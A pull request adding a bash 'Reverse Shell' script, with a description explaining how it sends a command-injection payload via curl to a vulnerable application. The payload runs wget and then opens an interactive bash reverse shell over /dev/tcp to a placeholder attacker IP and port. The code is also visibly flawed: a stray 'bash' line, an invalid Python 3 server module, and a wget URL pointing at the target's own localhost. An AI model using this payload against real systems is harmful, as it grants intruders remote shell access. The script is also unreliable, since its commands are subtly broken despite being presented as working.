### PR TITLE
Reverse Shell

### DIFF
--- a/Reverse Shell.sh
+++ b/Reverse Shell.sh
@@ -1,0 +1,16 @@
+bash
+# First, start a Python HTTP server in the background on the chosen port.
+# This example uses port 8080. You may need to change 'python3' to 'python' depending on your system.
+python3 -m SimpleHTTPServer 8080 &
+
+# Next, construct the curl POST request, specifying the local server's URL (including the port) where the server was started.
+# It's important to replace <attacker_ip> and <attacker_port> with the actual IP address and port you want the reverse shell to connect back to.
+# Also, replace <port> with the actual port that the vulnerable application is listening on.
+curl -X POST -d "cmd=wget --wait=2 --limit-rate=20K --recursive --page-requisites --user-agent=Mozilla --no-parent --convert-links --adjust-extension --no-clobber -e robots=off http://127.0.0.1:8080/ && bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1" http://localhost:<port>/data/local/tmp/misc/rsh
+
+
+#   These commands do the following:
+#   - Start a Python HTTP server at `http://127.0.0.1:8080/` to serve files from the current directory.
+#   - Use `curl` to send a POST request to a target URL with a payload to download resources from the Python server and then attempt to create a reverse shell back to the attacker's machine.
+
+#   Remember to replace placeholders like `<attacker_ip>`, `<attacker_port>`, and `<port>` with the appropriate values.


### PR DESCRIPTION
**Reverse Shell Script Description**

This script is designed to create a reverse shell connection from a vulnerable system back to an attacker's machine. The script consists of two main parts:

1. **Starting a Python HTTP Server**: The first part starts a Python SimpleHTTPServer on a chosen port (in this example, port 8080). This server makes the local directory accessible via HTTP.
2. **Constructing a Reverse Shell Payload**: The second part uses `curl` to send a POST request to a target URL with a payload designed to download resources from the Python server and then attempt to create a reverse shell back to the attacker's machine.

The script includes placeholders for the attacker's IP address, port number, and the local port number where the vulnerable application is listening. It is essential to replace these placeholders with actual values before running the script.

**Important Note**: This script should only be used in authorized security testing environments or for educational purposes. Never run this script on a system without proper authorization, as it can potentially exploit vulnerabilities and gain unauthorized access.